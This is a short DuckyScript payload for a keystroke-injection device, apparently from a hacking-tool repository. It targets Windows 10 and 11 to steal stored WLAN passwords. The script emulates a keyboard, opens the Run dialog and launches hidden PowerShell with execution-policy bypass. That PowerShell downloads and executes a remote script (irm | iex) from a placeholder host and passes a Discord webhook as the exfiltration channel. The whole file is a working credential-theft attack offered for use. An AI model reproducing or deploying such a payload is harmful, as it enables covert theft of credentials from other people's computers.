###################################################################
#                                                                 #
# Title        : WLAN-Windows-Passwords-Discord-Exfiltration      #
# Author       : Aleff                                            #
# Description: A script used to stole target WLAN Passwords.      #
# Category     : Credentials                                      #
# Target       : Windows 10-11                                    #
# Version      : 1.0                                              #
#                                                                 #
###################################################################

ATTACKMODE HID

# VARIABLES
# - Provide Discord Webhook
DISCORD_WEBHOOK='https://discordapp.com/api/webhooks/<webhook_id>/<token>'
# - Replace example.com with your own link. The Payload should be Windows-Passwords.ps1
PAYLOAD='example.com'

QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 250
QUACK STRING powershell -w h -ep bypass \$discord='$DISCORD_WEBHOOK';irm $PAYLOAD | iex
QUACK ENTER
